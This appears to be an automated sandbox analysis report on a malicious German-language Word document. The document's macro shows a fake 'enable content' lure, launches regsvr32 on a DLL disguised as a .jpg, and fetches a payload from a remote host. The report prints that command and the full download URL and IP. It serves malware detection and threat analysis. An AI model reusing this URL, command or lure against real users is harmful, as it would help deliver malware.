Analysis Report Datei-04.28.2021.doc

Overview

General Information

Sample Name: Datei-04.28.2021.doc
Analysis ID: 399362
MD5: 6747583727ce069aa8ae9d398d35e5bc
SHA1: 97667bf552bf5557666b5266003b0411bc1669bc
SHA256: 127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA with base64 encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6088 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • WINWORD.EXE (PID: 6224 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • regsvr32.exe (PID: 6360 cmdline: regsvr32 c:\programdata\argumentSelectTmp.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Register DLL with spoofed extension
Source: Process started; Author: Joe Security; Data: Command: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6224, ProcessCommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, ProcessId: 6360

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Datei-04.28.2021.doc; Virustotal: Detection: 12%
Machine Learning detection for sample
Source: Datei-04.28.2021.doc; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: global traffic; DNS query: name: better-transport-2008.com
Source: global traffic; TCP traffic: 192.168.2.5:49710 -> 45.142.215.160:80
Source: global traffic; HTTP traffic detected:
  GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: better-transport-2008.com
  Connection: Keep-Alive
Source: unknown; DNS traffic detected: queries for: better-transport-2008.com
Source: vbaProject.bin; String found in binary or memory: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Inhalt aktivieren't m % I i '00% O Type here to search Ki E a a g wg sf ^ @ g") ,::::,:, Cl
Source: Screenshot number: 4; Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren't m % I i '00% O Typ
Source: Screenshot number: 8; Screenshot OCR: Bearbeitung aktivieren" in der Qberen Leibte und dann auf .Inhale akrNieren". Page1 of 1 Owords It?
Source: Document image extraction number: 0; Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 0; Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Source: Document image extraction number: 1; Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 1; Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation; OLE, VBA macro: Module optionRemoveGeneric, Function memoryIndex, String ThisDocument
Source: Datei-04.28.2021.doc; OLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentation; OLE, VBA macro: Module listCopy, Function autoopen
Source: Datei-04.28.2021.doc; OLE indicator, VBA macros: true
Source: Datei-04.28.2021.doc; OLE indicator has summary info: false
Source: Datei-04.28.2021.doc; OLE indicator application name: unknown
Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: sfc.dll
Source: classification engine; Classification label: mal76.expl.winDOC@4/14@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\{E14FE529-DE62-4544-9D12-ECD5D5E4A8E5} - OProcSessId.dat
Source: Datei-04.28.2021.doc; OLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Datei-04.28.2021.doc; Virustotal: Detection: 12%
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Window found: window name: SysTabControl32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting12 | DLL Side-Loading1 | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting12 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Datei-04.28.2021.doc | 13% | Virustotal | | Browse
Datei-04.28.2021.doc | 100% | Joe Sandbox ML | |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
better-transport-2008.com | 1% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
https://cdn.entity. | 0% | URL Reputation | safe |
https://powerlift.acompli.net | 0% | URL Reputation | safe |
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://cortana.ai | 0% | URL Reputation | safe |
https://api.aadrm.com/ | 0% | URL Reputation | safe |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal | | Browse
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
https://officeci.azurewebsites.net/api/ | 0% | Virustotal | | Browse
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe |
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
https://ncus.contentsync. | 0% | URL Reputation | safe |
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4 | 0% | Avira URL Cloud | safe |
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
https://wus2.contentsync. | 0% | URL Reputation | safe |
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs | 0% | Avira URL Cloud | safe |
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
https://ncus.pagecontentsync. | 0% | URL Reputation | safe |
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe |
https://dataservice.o365filtering.com | 0% | URL Reputation | safe |
https://api.cortana.ai | 0% | URL Reputation | safe |
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe |
https://directory.services. | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
better-transport-2008.com | 45.142.215.160 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://login.microsoftonline.com/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://shell.suite.office.com:1443 | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://autodiscover-s.outlook.com/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://cdn.entity. | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://powerlift.acompli.net | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://cortana.ai | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://api.aadrm.com/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://api.microsoftstream.com/api/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://cr.office.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://portal.office.com/account/?ref=ClientMeControl | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://ecs.office.com/config/v2/Office | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://graph.ppe.windows.net | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://store.office.cn/addinstemplate | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://globaldisco.crm.dynamics.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://store.officeppe.com/addinstemplate | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://web.microsoftstream.com/video/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://graph.windows.net | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://dataservice.o365filtering.com/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
https://ncus.contentsync. | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4 | vbaProject.bin | false | Avira URL Cloud: safe | unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | | high
http://weather.service.msn.com/data.aspx | A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.dr | false | |
                                                                              high
                                                                              https://apis.live.net/v5.0/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                high
                                                                                                https://api.office.netA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.142.215.160 | better-transport-2008.com | Russian Federation | 202933 | CLOUDSOLUTIONSRU | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 399362
Start date: 28.04.2021
Start time: 17:52:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Datei-04.28.2021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.winDOC@4/14@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
